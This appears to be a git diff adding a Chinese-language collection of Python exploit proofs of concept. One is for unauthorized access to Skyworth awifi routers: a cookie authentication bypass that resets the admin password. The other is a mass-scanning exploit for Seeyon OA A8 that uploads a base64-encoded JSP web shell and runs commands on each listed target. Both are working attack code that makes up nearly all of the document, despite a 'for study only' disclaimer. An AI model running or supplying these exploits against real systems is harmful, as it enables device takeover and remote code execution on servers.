diff --git a/README.md b/README.md new file mode 100644 index 0000000..af9bad2 --- /dev/null +++ b/README.md @@ -0,0 +1,29 @@ +- [Penetration_Testing_POC_With_Python](#PenetrationTestingPOCWithPython) + - [IOT Device](#IOT-Device) + - [Web APP](#Web-APP) + - [Mobile APP](#Mobile-APP) + - [PC](#PC) + - [说明](#%E8%AF%B4%E6%98%8E) + +# Penetration_Testing_POC_With_Python +搜集有关渗透测试中用python编写的POC、脚本 + +## IOT Device + +- [天翼创维awifi路由器存在多处未授权访问漏洞](天翼创维awifi路由器存在多处未授权访问漏洞.md) + +## Web APP + +- [致远OA_A8_getshell_0day](致远OA_A8_getshell_0day.md) + +## Mobile APP + +- 1.xxx + +## PC + +- 1.xxx + +## 说明 + +> 此项目所有文章、代码均来源于互联网,仅供学习参考使用,严禁用于任何非法行为!使用即代表你同意自负责任! diff --git a/天翼创维awifi路由器存在多处未授权访问漏洞.md b/天翼创维awifi路由器存在多处未授权访问漏洞.md new file mode 100644 index 0000000..4580bcc --- /dev/null +++ b/天翼创维awifi路由器存在多处未授权访问漏洞.md @@ -0,0 +1,68 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|天翼创维awifi路由器存在多处未授权访问漏洞|2019-06-01|H4lo|[http://www.skyworth.com/](http://www.skyworth.com/)|[http://www.skyworth.com/](http://www.skyworth.com/)|Boa/0.94.14rc21|[CVE-2019-12862](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12862)| + +### 漏洞详情PDF:[详情](POC_Details/1.天翼创维awifi路由器存在多处未授权访问漏洞.pdf) + +### POC实现代码如下: + +``` python +#coding: utf-8 +#__author__: H4lo +import requests +import sys + + +payload = "authflag=1" +UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36" +headers = { + "User-Agent": UA, + "Cookie": payload +} + +def exp(ip): + info = """1. Login with no password\n2. Change administrator's password\n""" + print info + op = int(raw_input("Enter the options:")) + if op == 1: + url = "http://" + str(ip)+"/home.htm" + try: + res = requests.get(url,headers=headers,timeout=5) + if "title.htm" in res.text: + print "[+] The router is vulnerable" + else: + print "[-] The router is not vulnerable" + except Exception as e: + print str(e) + + elif(op == 2): + url = "http://" + str(ip) + "/boafrm/formAwifiSwitchSetup" + data = { + "olduserpass":"1", + "newpass":"123456", + "confirmnewpass":"123456", + "submit-url":"/password.htm" + } + try: + res = requests.post(url=url,headers=headers,data=data,timeout=5) + if "restartNow" in res.text: + print "[+] Password had be changed to 123456" + else: + print "[-] Some error!" + except Exception as e: + print str(e) + + else: + print "error options!" +if __name__ == '__main__': + ip = sys.argv[1] + exp(ip) +``` + +--- + +### POC截图效果如下: + +![POC运行截图](img/1.png) diff --git a/致远OA_A8_getshell_0day.md b/致远OA_A8_getshell_0day.md new file mode 100644 index 0000000..3967cd5 --- /dev/null +++ b/致远OA_A8_getshell_0day.md @@ -0,0 +1,108 @@ +### 漏洞简介 + +|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号| +--------|--------|---------|--------|-------|----|------| +|seeyon_rce致远 OA A8 getshell_0day|2019-06-26|360-CERT|[http://www.skyworth.com/](http://www.seeyon.com/) | [http://www.seeyon.com/](http://www.seeyon.com/) | A8 V7.0 SP3/V6.1 SP2|[B6-2019-062601](https://cert.360.cn/warning/detail?id=d877451a4dbebd852d01e9730d762076)| + +### POC实现代码如下: + +```python +# Wednesday, 26 June 2019 +# Author:nianhua +# Blog:https://github.com/nian-hua/ +# python3 版本 + +import re +import requests +import base64 +from multiprocessing import Pool, Manager + +def send_payload(url): + + headers = {'Content-Type': 'application/x-www-form-urlencoded'} + + payload = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U=" + + payload = base64.b64decode(payload) + + try: + + r = requests.post(url + '/seeyon/htmlofficeservlet', data=payload) + + r = requests.get( + url + '/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+echo+wangming') + + if "wangming" in r.text: + + return url + + else: + + return 0 + + except: + + return 0 + +def remove_control_chars(s): + control_chars = ''.join(map(chr, list(range(0,32)) + list(range(127,160)))) + + control_char_re = re.compile('[%s]' % re.escape(control_chars)) + + s = control_char_re.sub('', s) + + if 'http' not in s: + + s = 'http://' + s + + return s + +def savePeopleInformation(url, queue): + + newurl = send_payload(url) + + if newurl != 0: + + fw = open('loophole.txt', 'a') + fw.write(newurl + '\n') + fw.close() + + queue.put(url) + +def main(): + + pool = Pool(10) + + queue = Manager().Queue() + + fr = open('url.txt', 'r') + + lines = fr.readlines() + + for i in lines: + + url = remove_control_chars(i) + + pool.apply_async(savePeopleInformation, args=(url, queue,)) + + allnum = len(lines) + + num = 0 + + while True: + + print(queue.get()) + + num += 1 + + if num >= allnum: + + fr.close() + + break + +if "__main__" == __name__: + + main() +``` +